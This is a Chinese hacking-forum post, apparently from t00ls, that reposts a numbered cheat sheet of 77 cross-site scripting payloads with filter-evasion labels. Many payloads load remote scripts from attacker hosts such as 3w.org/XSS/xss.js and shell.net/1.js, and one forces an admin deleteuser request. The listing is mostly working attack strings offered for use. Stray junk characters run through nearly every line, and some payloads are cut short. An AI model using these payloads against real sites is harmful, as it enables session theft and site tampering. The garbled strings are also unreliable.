貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
) O7 R# L/ \ D x$ C(1)普通的XSS JavaScript注入
' H$ [6 b! X/ X- F D<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
6 g) Y6 M8 W& @- O(2)IMG标签XSS使用JavaScript命令; _1 a- d* C8 j& L0 l- Y! @
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>, C# r5 M+ {4 C+ C% c5 A
(3)IMG标签无分号无引号
* l; S1 Y) W' _; F- s) l+ C: z<IMG SRC=javascript:alert(‘XSS’)>6 H4 A2 r1 z' x
(4)IMG标签大小写不敏感
0 q: {4 H4 ?5 V<IMG SRC=JaVaScRiPt:alert(‘XSS’)>" `0 x1 t) a7 m5 ^$ t9 _# g3 m
(5)HTML编码(必须有分号)
. z& B: ~7 J! ^$ X* H" _: u<IMG SRC=javascript:alert(“XSS”)>( z4 Z& _ y2 w$ r7 ]
(6)修正缺陷IMG标签
+ J5 Q6 e% G7 M! o; g& N<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>! {- a5 s' A0 w" x, S
/ u+ ~8 Z4 R! _; L: _! X( i( a6 ^5 g+ t' I/ r2 F
(7)formCharCode标签(计算器)
% E* c0 W* n& i; s3 F$ Z/ C<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>: }. ^4 I) z+ {: P( A/ c7 _
(8)UTF-8的Unicode编码(计算器)7 r3 H( l! {# \1 O' {) G
<IMG SRC=jav..省略..S')>, @+ Y' {0 r: j; G
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)3 q2 p U# E% F9 Y. L$ m* f# h
<IMG SRC=jav..省略..S')>
* @2 P: {/ h( h7 a! U(10)十六进制编码也是没有分号(计算器)+ ~( T2 S2 B4 l D, h. h
<IMG SRC=java..省略..XSS')>
# j1 N5 }. Q5 R(11)嵌入式标签,将Javascript分开
# L$ p8 Q: ]7 r2 G% Q<IMG SRC=”jav ascript:alert(‘XSS’);”>
% v, I* r- u- x( [2 B/ }. e5 O( N2 L(12)嵌入式编码标签,将Javascript分开
: }0 O0 {1 X% [9 g8 g/ ]/ o t<IMG SRC=”jav ascript:alert(‘XSS’);”>
9 l: l4 V- \7 g- a" d(13)嵌入式换行符
; i' S0 F) i6 S6 b<IMG SRC=”jav ascript:alert(‘XSS’);”>1 o* [$ D5 I9 r0 h8 G8 c0 l
(14)嵌入式回车% s) `: |$ B4 ]0 H9 M0 }- P
<IMG SRC=”jav ascript:alert(‘XSS’);”>6 P( S- [ G# i/ n0 u/ `& k
(15)嵌入式多行注入JavaScript,这是XSS极端的例子# B0 y& n' E4 W; U+ L" p4 ^5 { k
<IMG SRC=”javascript:alert(‘XSS‘)”>
- q7 L7 {: a* |+ F' A(16)解决限制字符(要求同页面)
1 m4 D# [! n9 M' x. j& M<script>z=’document.’</script>
^( y7 e6 V; C) N" y5 X4 n<script>z=z+’write(“‘</script># H' q, z8 s; G% c. N4 i8 |$ _& a1 C
<script>z=z+’<script’</script>3 l8 f! n/ Q; [* o+ v# p/ s f0 d
<script>z=z+’ src=ht’</script> j: q/ j' I, l3 h' q' U' T( o5 z, V# k1 D
<script>z=z+’tp://ww’</script>
# _; a! U9 Y# V/ W5 M1 _3 |<script>z=z+’w.shell’</script>3 K) q' ?% {' h5 m* j) W
<script>z=z+’.net/1.’</script>* ?) @+ w# K) q4 ^; m9 I6 D
<script>z=z+’js></sc’</script> u8 S9 \/ v' w* [/ d' }8 d
<script>z=z+’ript>”)’</script> B8 C; L! T0 \) [; r: }$ M
<script>eval_r(z)</script>" m2 L7 \) q8 {
(17)空字符12-7-1 T00LS - Powered by Discuz! Board
, w, [- q$ r' A8 _* Ehttps://www.t00ls.net/viewthread ... table&tid=15267 2/6; n% m# t! v! W
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
) \6 D- _ X4 g. k" W5 L7 Z y(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
5 e* m e, ]1 b9 }# E Y3 iperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
( X4 y( W7 J( w(19)Spaces和meta前的IMG标签0 }( ~+ ?6 K: |
<IMG SRC=” javascript:alert(‘XSS’);”>
& v5 G) p/ y0 Z2 J) }; {& J4 a(20)Non-alpha-non-digit XSS
7 j$ e6 b0 x+ p9 v2 R<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>0 {6 ^2 s* g( s7 ]4 c' s5 I
(21)Non-alpha-non-digit XSS to 2; {- m! z1 w! ~6 W
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
d; R% \- m# c1 d: q* ?( Y1 U' B" u(22)Non-alpha-non-digit XSS to 3
9 V. e9 W0 c! u/ u1 j3 X6 ^9 T<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>9 E# x. a3 \! x' r
(23)双开括号8 a* p+ j5 e6 [$ ~0 p/ s; v, F
<<SCRIPT>alert(“XSS”);//<</SCRIPT>" |# u- Q7 t! i
(24)无结束脚本标记(仅火狐等浏览器), k! J8 D7 v7 ^+ G, G
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
" ]2 @6 E- I6 d) c" p9 |, [: O(25)无结束脚本标记2
2 N7 b+ H# E, }: i; e# c6 f* l<SCRIPT SRC=//3w.org/XSS/xss.js>9 u, j6 R* I) D( P D
(26)半开的HTML/JavaScript XSS
7 s- S8 M- h! ?& C9 o<IMG SRC=”javascript:alert(‘XSS’)”/ D8 v; n" ^& ?9 K0 G6 q
(27)双开角括号
i" G) w' \: J/ o; ^- T# R* J<iframe src=http://3w.org/XSS.html <6 F' z$ N2 I6 Z- `, |: w0 S
(28)无单引号 双引号 分号
6 a+ ~% p) `7 s' z. S" K$ Y<SCRIPT>a=/XSS/
J6 g& W1 a$ L, d9 N6 s# aalert(a.source)</SCRIPT>' _3 v \$ L- o( a k
(29)换码过滤的JavaScript
" G% T" D0 W* s+ p' }# }& t: `\”;alert(‘XSS’);//
8 I K0 q! }! ~(30)结束Title标签
( Y; y- k! M. g/ {( z- m! _</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>, @7 ^) D c9 j/ o
(31)Input Image# y, `. F; H% H5 q: u4 B. B, o
<INPUT SRC=”javascript:alert(‘XSS’);”>
9 b0 c$ @9 M$ S3 w5 w% B5 y$ i4 j(32)BODY Image
3 I9 j! i, G A- I5 M' g) B$ }<BODY BACKGROUND=”javascript:alert(‘XSS’)”>6 L$ y6 |! B+ [5 ^2 H0 C$ o+ Z
(33)BODY标签# R0 V1 b4 C3 [' Q/ d9 ]) @1 {
<BODY(‘XSS’)>- U( |5 C1 G, n
(34)IMG Dynsrc
# T/ Z9 P% U: R" v0 P" ]1 x<IMG DYNSRC=”javascript:alert(‘XSS’)”>6 }: k# H% H' I' V8 b5 l9 g& d' n
(35)IMG Lowsrc
2 R" ^, E, b+ f<IMG LOWSRC=”javascript:alert(‘XSS’)”>/ S8 u8 y o5 O {
(36)BGSOUND
4 n1 l/ g) k6 u( f<BGSOUND SRC=”javascript:alert(‘XSS’);”>2 C8 y% }8 ~* D$ j& |
(37)STYLE sheet0 C; A6 V* g8 ?5 ^* V, k1 U: o& j9 A
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>8 w. Q+ v& z7 t' I3 p2 n0 i. y: `3 i B
(38)远程样式表
+ }1 r" ~1 L! |$ Z7 p<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
0 j5 P0 L3 N- e0 D w8 [; l(39)List-style-image(列表式)2 a% p, M }8 X5 c( S3 H5 l
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
7 H# f* I) ~! V, @0 d" N* K(40)IMG VBscript
2 p! H: f( w: J" o<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS- m. e! u/ u! E* g
(41)META链接url$ U; e3 N: D i: C9 q
`8 W+ ]( Y5 @6 R. |& F) X
1 B! J# V( Y+ ?+ Z
<META HTTP-EQUIV=”refresh” CONTENT=”0;
& U* M2 K/ {# T" [URL=http://;URL=javascript:alert(‘XSS’);”>
* y5 [4 t) z! S+ ]4 @& @/ S(42)Iframe I' c: F7 J% K2 ~/ x8 k
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
! w. ~8 \/ b" T(43)Frame% o- ~6 B' s9 s" T2 F
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board: y' U5 |: R# J+ X8 C( z5 s+ P
https://www.t00ls.net/viewthread ... table&tid=15267 3/6
: h1 P/ b; A6 B. C. k4 T: o(44)Table$ P3 Q& Z) V' W8 [5 T7 i) p
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
" `$ q @, F7 C- P(45)TD
" `/ j b4 X( j; O6 t K- y/ e3 Y) ^<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>4 Q# d+ r" _0 N% c6 J5 m( _
(46)DIV background-image, z; L( c( r! ~- v! d: f* \
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>5 _% S9 m6 B1 A8 w# X1 R/ }; e+ S
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-9 g7 Y* S0 X" Y/ Z# {
8&13&12288&65279)
% q: x. u% Q% I* f9 ?<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
. R) s, W: g7 u) j& ](48)DIV expression; |, C/ q+ Q, W! B; z
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>+ i) L2 f+ d9 J3 I' b9 ~4 h
(49)STYLE属性分拆表达
' ^: T" M3 M/ I" P<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>9 O/ d6 A: @5 P$ l1 w7 Q
(50)匿名STYLE(组成:开角号和一个字母开头)
6 r% y2 G' @1 G/ v<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
" y5 h0 @4 Q6 N) T7 ^(51)STYLE background-image0 i' L, J6 U, O) N- b" j6 g
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A* w" j/ H- p$ ]* e& m G1 v
CLASS=XSS></A>7 C3 p' b# G2 Y1 M3 e" n9 i
(52)IMG STYLE方式/ Q$ R H( t- I& K; f
exppression(alert(“XSS”))’>/ n) P4 n4 |3 H$ ?: U8 m9 |, h, u
(53)STYLE background
5 V7 M: A0 n \/ l# k<STYLE><STYLE
9 r3 B2 w5 o/ O w! @/ ftype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>. S% B, j/ \( k6 ~) [$ y
(54)BASE" V) u% G0 e- t" D2 ~' E+ H
<BASE HREF=”javascript:alert(‘XSS’);//”>
5 @5 m- p F' L! V(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS- k1 Z0 f0 ?: V& {5 g, V
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
# X0 b* {6 N1 V. z! B(56)在flash中使用ActionScrpt可以混进你XSS的代码
# \9 r9 U: l& |: A1 ]a=”get”;. e' O6 W' W) z4 T6 v2 v: X
b=”URL(\”";
3 g# P+ g# |3 K8 o9 yc=”javascript:”;/ j4 o2 N# g0 P# I/ u
d=”alert(‘XSS’);\”)”;
5 C# x5 { Z' q( w! m$ j4 N8 A& Aeval_r(a+b+c+d);& R" z0 T# \5 I& l
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
: K4 u8 c M9 E" C<HTML xmlns:xss>8 n0 Z5 K2 a" a
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>1 g( [, U2 V" i7 m9 [- i9 k
<xss:xss>XSS</xss:xss>
5 ~+ }$ p' ~3 V" Q</HTML>9 E. l7 K) q: x2 z
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用, E; D; A) Z6 @3 d1 A( Q# p
<SCRIPT SRC=””></SCRIPT>
) i2 c& H, Q% o& B9 n# e(59)IMG嵌入式命令,可执行任意命令3 _' P7 E5 m m+ w9 _
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
1 g6 k/ O% n% G' [+ W+ u% s% j(60)IMG嵌入式命令(a.jpg在同服务器)7 S, k1 u4 u& [9 x5 O
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser) O u' ` I' E
(61)绕符号过滤$ |; a9 r4 w9 y- N" S6 }8 U5 r8 D
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
( e r6 z: s8 V(62)+ h! ^" C: c' G% ~2 t: M7 u7 y4 U! l
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
0 b) N- p( w* g2 D(63)
# c4 z2 G+ K5 }; G# y<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>6 _, i* v! I* ]1 n }6 f- O
(64)
9 ]! w3 h3 Q1 r5 K8 j<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>1 ]( L" g9 e* T% E9 T! G
(65)
, l% j4 ?8 T1 ~, ?( t* w' c<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
. h' i3 o' b4 c6 Q+ W6 Q& [(66)12-7-1 T00LS - Powered by Discuz! Board
3 R9 L7 z, J8 J3 C/ ?https://www.t00ls.net/viewthread ... table&tid=15267 4/64 ?# I: D0 h/ \
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>/ N" G2 Q$ B8 h+ {1 Z* V2 U, {
(67)
" Q( K% b5 s3 `! S/ b2 J<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”># C4 L) ]3 s9 V! L+ j: \3 n
</SCRIPT>
$ D8 n. ^: d. h. g" u3 r2 ](68)URL绕行
3 j0 A7 o* C3 B1 i9 q<A HREF=”http://127.0.0.1/”>XSS</A>
0 W4 p: e6 w" S" `- E; e(69)URL编码1 T) M: h0 G1 P% X
<A HREF=”http://3w.org”>XSS</A>
" ?, M/ L6 M7 B& g(70)IP十进制
- C* f! [' }3 m+ I0 G f<A HREF=”http://3232235521″>XSS</A>
* A9 c; V' m/ g$ F2 V(71)IP十六进制" y/ I- P2 m: Q
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
( l' S4 L5 Y: p/ h0 Z(72)IP八进制( o7 r! V" Y. b) Z" H- }
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
( o& ?9 c9 B( a" X) z9 b(73)混合编码) {/ d/ g: ^2 n/ r/ T& G
<A HREF=”h( I5 L3 v" t; ^% L b# f' I- ^
tt p://6 6.000146.0×7.147/”">XSS</A>
" [$ {% E6 C: r3 P1 q(74)节省[http:]
; @. x' }3 b5 A- s9 y<A HREF=”//www.google.com/”>XSS</A>
7 p8 z2 C& d8 h( i) V% m(75)节省[www] |: N4 m% o( {3 M1 f
<A HREF=”http://google.com/”>XSS</A># h- l* V, ^7 G g& J4 O6 h4 W
(76)绝对点绝对DNS
+ N; i9 z' O8 O2 [( @( Q z6 ~<A HREF=”http://www.google.com./”>XSS</A>& J, d$ Z9 X0 R; x! f. \6 G
(77)javascript链接& N, q5 { c g6 H* }+ A$ x$ B/ z% y% Y
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
$ @& q9 \" ?- U7 g: a2 O+ O- g1 H x5 n6 ?% U+ W
原文地址:http://fuzzexp.org/u/0day/?p=14
$ y: v, i/ S4 q% J# B+ h. p! o$ x9 } C! G6 I
|
发表于 2013-4-19 19:22:37
收藏
支持
反对